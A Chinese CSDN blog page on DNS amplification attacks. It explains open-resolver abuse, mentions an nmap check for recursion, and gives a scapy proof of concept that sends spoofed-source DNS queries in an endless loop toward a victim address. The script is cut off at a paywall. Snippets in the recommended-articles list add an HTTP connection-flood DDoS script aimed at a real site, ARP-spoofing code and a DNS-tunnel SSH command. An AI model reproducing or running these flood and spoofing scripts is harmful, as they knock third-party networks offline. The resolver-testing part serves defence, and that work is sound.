dns放大攻击python代码_测试DNS区域递归漏洞以及避免DNS放大攻击

最新推荐文章于 2024-05-15 02:53:12 发布
最新推荐文章于 2024-05-15 02:53:12 发布
阅读量345 收藏 2
点赞数
文章标签: dns放大攻击python代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39716105/article/details/111438412
版权

尽管专家提醒过很多次,但仍然有非常多的DNS服务器允许递归解析到外网的设备,这一点可以被用来进行DNS放大攻击。

那么怎样攻击呢?通常,攻击者使用僵尸网络向受害者的IP地址发送一个伪造的DNS请求,错误设置的DNS应答会使数据包被发送到受害者的IP地址,从而导致分布式拒绝服务攻击(DDoS)。

怎样测试你的DNS设备是否允许来自外部的递归解析呢?你可以使用这个叫dns-recursion 的nmap脚本:

如果它没有被启用,你只会得到一个开放端口的指示:

这个攻击是怎么运作的?我们来看下面的示意图:

攻击的POC可以很容易地用如下的scapy脚本被执行,由攻击者决定是否执行它:

#!/usr/bin/python

from scapy.all import *

victimIP = raw_input("Please enter the IP address for the victim: ")

dnsIP = raw_input("Please enter the IP address for the misconfigured DNS: ")

while True:

send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd

最低0.47元/天 解锁文章
weixin_39716105
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python:实现全连接攻击(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-28 154
python:实现全连接攻击(附完整源码)
DNS隐蔽隧道工具--dnScapy流量特征检测分析
qq_36259703的博客
10-12 203
原始项目地址找不到了,这里是别人从原始项目地址留存下来的。内网主机只开放了DNS相关端口,只允许DNS相关流量通讯,可通过DNS隧道进行ssh通讯。
python攻击脚本实例-一键黑客工具:一个Python脚本搞定所有攻击操作
weixin_39745724的博客
11-11 3292
近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该脚本就会爬取互联网,寻找可以攻击的脆弱主机(通常是因为没打补丁),并自动取得对这些主机的控制权。完全无需什么高端的黑客技术。本文福利:私信回复【PDF】可获取Py...
网络安全最新DNSObserver检测DNS安全漏洞_检测是否存在dns漏洞,2024年最新34岁网络安全开发大叔感慨
最新发布
2401_84264096的博客
05-15 658
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
pythonddos攻击代码_Python基于http的ddos攻击代码
weixin_39924584的博客
11-25 1275
基于http的ddos,主要就是靠占用连接数达到攻击目标,但也非常危险,会暴露攻击者的ip,慎用#!/usr/bin/env pythonimport socketimport timeimport threading#Pressure Test,ddos tool#---------------------------MAX_CONN=20000PORT=80HOST="www.baidu.co...
python网络渗透之:DOS攻击
hih30250的博客
12-18 2902
Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。
DNS_dns_python_
09-29
下面是一个基础的Python DNS服务器示例代码: ```python import dns.query import dns.server from dns import resolver, rdataclass, rdatatype def answer(request, response): question = request.question[0]...
GET_DNS.rar_dns _获取域
09-19
2. **归查询**:如果本地缓存中没有,系统会向配置的首选DNS服务器发送归查询请求。DNS服务器会负责整个查询过程,直到找到正确的IP地址。 3. **DNS服务器解析**:DNS服务器通过DNS层次结构,从根域名服务器...
dns.rar_dns
09-20
在本文中,我们将深入探讨DNS的工作原理、重要性以及如何根据URL获取IP地址。 首先,理解DNS的基本概念是至关重要的。DNS是一个分布式数据库系统,由全球各地的服务器组成。这些服务器存储了域名与对应IP地址的映射...
DynDNS95.zip_dns _linux 编程_动态域名_动态域名解析_域名解析
09-23
DynDNS95.zip文件内容涉及了DNS(Domain Name System)在Linux环境下的编程,以及动态域名和域名解析的相关知识。以下是这些主题的详细说明: 一、DNS系统 DNS是互联网的核心组成部分之一,它将易于记忆的域名(如...
python实现域名系统(DNS)正向查询的方法
09-21
Python编程中,进行域名系统(DNS)正向查询是获取IP地址的重要步骤。正向查询的基本作用是从主机名解析出对应的IP地址,这在互联网通信中起到关键作用。Python的socket模块提供了一个名为`getaddrinfo`的函数,...
dnscapy:从 code.google.compdnscapy 自动导出
06-19
DNScapy(非官方镜像) 从 code.google.com/p/dnscapy 自动导出 DNScapy 是一个 DNS 隧道工具。 代码非常轻巧,是用 Python 编写的。 它包括一个服务器和一个客户端。 服务器可以处理多个客户端。 DNScapy 通过 DNS 数据包创建 SSH 隧道。 支持 SSH 连接、SCP 和代理袜子 (SSH -D)。 您可以为隧道使用 CNAME 记录或 TXT 记录。 默认模式是 RAND,它随机使用 CNAME 和 TXT。 DNScapy 使用 Scapy ( ) 进行 DNS 数据包伪造和他的网络自动机 API。 DNScapy 仍在开发中。 当前版本是 0.99b,似乎运行良好。 随意克隆和测试它! 软件要求 Python >= 2.6 Scapy >= 2.1-dev (2.2 recommended) Openssh L
python dns管理平台_python dns服务器
weixin_39601088的博客
12-18 532
使用PyDNS查询PyDNS并不是作为标准的Python发行版本的一部分而随Python一起发行的.因此,必须单独安装,可以从http://pydns.sourceforge.net/下载,然后按照安装指南来安装.在Debian或Ubuntu中可以用apt-get install python-dns来安装 初始化...文章孤独的猫董2011-05-03522浏览量Python 安全类目推荐 (持...
dns放大攻击
JPshangdexiaofeixia的博客
09-11 1625
与其他放大攻击相同,DNS放大是一种反射攻击。在这种情况下,反射是通过一个DNS解析器诱发一个响应到一个虚假的IP地址上。 在DNS 放大攻击期间,攻击者将一个伪造的IP地址发送到一个开放的DNS解析器中,促使它使用DNS响应回复该地址。无数的伪造查询被发送出去,并且有若干DNS解析器同时回复,受害者的网络很容易被大量的DNS响应所淹没。”放大” 是指诱发一个与其发送的原始包请求不成比例的服务器...
浅析 DNS 反射放大攻击
easylife206的专栏
07-11 5535
DNS 反射放大攻击分析前阵子业务上碰到了 DDOS 攻击,正好是 DNS 反射型的,之前只是听过,没自己处理过,仔细学习了一番之后做点记录。简介DNS 反射放大攻击主要...
DNS Amplification Attack PoC(DNS放大攻击
Yatere的天平秤
05-14 5065
#!/usr/bin/perl # Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.21_01.tar.gz # cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well. # P
使用Python进行无线攻击--Dnspwn攻击
韦宇的博客
07-08 3359
引言   前不久,我在Raidersec博客上发布了一篇博客文章,介绍了如何利用Python和Scapy实现绕过鉴权的攻击。我非常高兴写出这篇文章,因为这么做我不仅了解了如何使用aircrack套件,还有机会深度地了解无线攻击运作方式有什么不同。   因此,正如文中所说,这篇博客文章将引出一系列讨论如何利用Python实现普通的无线攻击的短小精悍的博客文章。像以往一样,我希
python网络攻击代码_Python-python网络编程写arp攻击代码
weixin_39771987的博客
11-24 619
from scapy.all import ARP,send,arpingimport sys,re,random,timestdout=sys.stdoutipIPADDR="192.168.1.102"网关gateway_ip="192.168.1.1"tmp=[]伪造网关mac地址for i in range(0,6):tmp.append(str("%02x"%random.randint...
dnscapy使用——本质上是建立ssh的代理(通过dns tunnel)
weixin_33696822的博客
11-16 219
git clone https://github.com/cr0hn/dnscapy.git easy_install Scapy 服务端: python dnscapy_server.py a.friendsxxx.com 45.77.39.xxx 客户端: ssh -o ProxyCommand="sudo python dnscapy_client...
DNS安全防护:解析服务节点与攻击事件分析
安全事件如游戏私服攻击、暴风影音事件、百度域名无法访问以及新网DNS攻击事件,都突显了DNS安全防护的必要性。攻击者可能通过攻击DNS服务器,篡改域名解析记录,或者利用DDoS攻击使服务瘫痪,从而对业务造成严重...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值